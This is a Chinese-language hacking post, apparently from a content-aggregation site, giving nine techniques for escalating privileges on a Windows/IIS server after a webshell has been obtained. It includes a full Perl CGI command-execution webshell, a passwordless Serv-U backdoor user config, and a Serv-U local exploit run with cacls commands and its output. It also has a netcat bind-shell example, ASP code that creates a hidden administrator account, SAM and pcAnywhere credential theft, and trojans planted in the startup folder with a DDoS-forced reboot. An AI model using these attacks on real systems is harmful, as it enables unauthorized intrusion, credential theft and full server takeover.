提升(web)权限终极9技巧

当我们取得一个webshell时候,下一部要做的就是提升权限 
个人总结如下: 
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码 
用到破解sam密码的软件有LC,SAMinside 
3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息 
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转 
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 
[USER=WekweN|1] 
Password= 
HomeDir=c:TimeOut=600 
Maintenance=System 
Access1=C:\|RWAMELCDP 
Access1=d:\|RWAMELCDP 
Access1=f:\|RWAMELCDP 
SKEYValues= 
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限

4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 
5.看能否跳转到如下目录 
c:\php, 用phpspy 
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell 
#!/usr/bin/perl 
binmode(STDOUT); 
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); 
$_ = $ENV{QUERY_STRING}; 
s/%20/ /ig; 
s/%2f/\//ig; 
$execthis = $_; 
syswrite(STDOUT, "<HTML><PRE>\r\n", 13); 
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR"; 
system($execthis); 
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17); 
close(STDERR); 
close(STDOUT); 
exit; 
保存为cgi执行, 
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir 
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录 
http://anyhost//cmd.pl?c\perl\bin\su.exe 
返回: 
Serv-u >3.x Local Exploit by xiaolu 
USAGE: serv-u.exe "command" 
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 
现在是 IUSR 权限,提交: 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F" 
如果返回下面的信息,就表示成功了 
Serv-u >3.x Local Exploit by xiaolu 
<220 Serv-U FTP Server v5.2 for WinSock ready... 
>USER LocalAdministrator 
<331 User name okay, need password. 
****************************************************** 
>PASS #l@$ak#.lk;0@P 
<230 User logged in, proceed. 
****************************************************** 
>SITE MAINTENANCE 
****************************************************** 
[+] Creating New Domain... 
<200-DomainID=2 
<220 Domain settings saved 
****************************************************** 
[+] Domain xl:2 Created 
[+] Creating Evil User 
<200-User=xl 
200 User settings saved 
****************************************************** 
[+] Now Exploiting... 
>USER xl 
<331 User name okay, need password. 
****************************************************** 
>PASS 111111 
<230 User logged in, proceed. 
****************************************************** 
[+] Now Executing: cacls.exe c: /E /T /G everyone:F 
<220 Domain deleted 
这样所有分区为everyone完全控制 
现在我们把自己的用户提升为管理员: 
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"

6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再将asp.dll加入特权一族 
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样) 
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 
7.还可以用这段代码试提升,好象效果不明显 
<<%Response.Expires=0">%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.CreateObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.Create("user","WekweN$") 
od.SetPassword "WekweN" <-----密码 
od.SetInfo 
Set of=GetObject(oz&"/WekweN$,user") 
oe.Add(of.ADsPath) 
Response.write "WekweN$ 超级帐号建立成功!"%>

用这段代码检查是否提升成功 
<%@codepage=936%> 
<%Response.Expires=0 
on error resume next '查找Administrators组帐号 
Set tN=server.CreateObject("Wscript.Network") 
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") 
For Each admin in objGroup.Members 
Response.write admin.Name&"<br>" 
Next 
if err then 
Response.write "不行啊:Wscript.Network" 
end if 
%> 
8.C:\Program Files\Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。 
9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 
等到主机重启或者你ddos逼它重启,来达到权限提升的目的。

(0)

相关推荐

  • 提升(web)权限终极9技巧

    当我们取得一个webshell时候,下一部要做的就是提升权限  个人总结如下:  1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆  2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码  用到破解sam密码的软件有LC,SAMinside  3.C:\Docume

  • Android运行时权限终极方案(PermissionX)

    各位小伙伴们大家早上好,不知道你的<第三行代码>已经读到哪里了? 有些朋友的阅读速度真是令人印象深刻,我记得在<第三行代码>刚刚发售一周不到的时间里,竟然就有人已经读到第9章了(因为公众号后台有人回复第9章里隐藏的关键字).现在,<第三行代码>已经出版一个月有余了,相信已经有不少朋友将全本书都看完了. 全书都看完的朋友一定知道,<第三行代码>的最后一章是带着大家一起开发了一个开源库:PermissionX.这一章的主旨是为了让你了解一个开源库整体的开发与发布

  • 分享提高ASP.NET Web应用性能的技巧

    在这篇文章中,将介绍一些提高 ASP.NET Web 应用性能的方法和技巧.众所周知,解决性能问题是一项繁琐的工作,当出现性能问题,每个人都会归咎于编写代码的开发人员. 那性能问题到底该如何解决?以下是应用系统发布前,作为 .NET 开发人员需要检查的点. 1.debug=「false」 当创建 ASP.NET Web应用程序,默认设置为「true」.开发过程中,设置为「true」是非常有用多,但在应用程序发布部署时,需将其设置为「false」. <compilation defaultLang

  • 用漏洞提升计算机控制权限(图)

    据称Windows COM结构存在安全问题,本地或远程攻击者可以利用这个漏洞提升特权或执行任意指令.受影响的操作系统和程序在处理COM结构化存储文件时,在访问共享内存的方式中存在权限提升漏洞,一个已登录的用户可利用此漏洞完全控制系统. 安全公告牌 这是一个权限提升漏洞. 成功利用此漏洞的攻击者可以完全控制受影响的系统. 攻击者可随后安装程序;查看.更改或删除数据;或者创建拥有完全用户权限的新账户. 要利用此漏洞,攻击者必须能够本地登录到系统并运行程序. 受影响的系统包括:Windows 2000

  • Linux Apache Web 服务器终极教程

    APACHE系统介绍 根据著名的WWW服务器调查公司所作的调查,世界上百分之五十以上的WWW服务器都在使用Apache,是世界排名第一的WEB服务器.Apache的诞生极富有戏剧性.当NCSA WWW服务器项目停顿后,那些使用NCSA WWW服务器的人们开始交换他们用于该服务器的补丁程序,他们也很快认识到成立管理这些补丁程序的论坛是必要的.就这样,诞生了Apache Group,后来这个团体在NCSA的基础上创建了Apache. Apache的主要特征是: . 可以运行上所有计算机平台: . 支

  • php之对抗Web扫描器的脚本技巧

    大部分Web扫描器(包括上传.管理后台扫描器)都是通过判断HTTP的200返回来确定页面存在的,在页面存在的基础上,这些扫描期才会开始对漏洞进行扫描.既然不能保证内部逻辑的严密,那么就在输入/输出这个瓶颈上做文章,当输入错误的密码或者权限失败时,我们自己返回一个400错误的HTTP消息来误导扫描器不再继续进行扫描(包括哪些手工入侵者) 以PHP为例: 复制代码 代码如下: <?php ob_start(); if ('Password' != $_GET['password']) header(

  • GZIP压缩Tomcat并提升web性能过程图解

    一.前言 最近做了个项目,遇到这么一个问题:服务器返回给客户端的json数据量太大(大概65M),在客户端加载了1分多钟才渲染完毕(当然这加载时间也和本地的下行带宽有关),费时耗流量,用户体验极其不好.后来网上搜优化的方法,就是Http压缩. HTTP压缩可以大大提高浏览网站的速度,它的原理是,在客户端请求服务器对应资源后,从服务器端将资源文件压缩,再输出到客户端,由客户端的浏览器负责解压缩并浏览.即:通过减小HTTP响应大小来减少响应时间.相对于普通的浏览过程HTML ,CSS,Javascr

  • linux下建站目录分配权限的经验技巧总结

    前言 在网上搜索网站文件夹权限配置一般都是是: 文件夹权限最小权限755 文件最小权限644 文件的可读可写可执行很容易理解,但文件夹的权限就需要好好梳理梳理啦,下面是自己的一些经验分享给大家,需要的一起来看看详细的介绍: 前期工作 先创建一个文件夹 test mkdir test 在该目录下创建一个1.txt文件并写入111 cat > 1.txt 111 现在退出该目录来一个一个分析改目录权限 不要用root用户来创建文件夹,因为文件权限配置对root用户无效 目录的可执行权限 chmod

  • JS 中可以提升幸福度的小技巧(可以识别更多另类写法)

    1. 类型强制转换 1.1 string强制转换为数字 可以用*1来转化为数字(实际上是调用.valueOf方法) 然后使用Number.isNaN来判断是否为NaN,或者使用 a !== a 来判断是否为NaN,因为 NaN !== NaN '32' * 1 // 32 'ds' * 1 // NaN null * 1 // 0 undefined * 1 // NaN 1 * { valueOf: ()=>'3' } // 3 常用: 也可以使用+来转化字符串为数字 + '123' // 1

  • 一个提升PostgreSQL性能的小技巧

    在一个(差)的PostgreSQL 查询中只要一个小小到改动(ANY(ARRAY[...])to ANY(VALUES(...)))就能把查询时间从20s缩减到0.2s.从最简单的学习使用 EXPLAIN ANALYZE开始,到学习使用 Postgres community大量学习时间的投入将有百倍时间到回报. 使用Postgres监测慢的Postgres查询 在这周早些时候,一个用于我们的图形编辑器上的小表(10GB,1500万行)的主键查询,在我们的一个(多个)数据库上发生来大的查询性能问题

随机推荐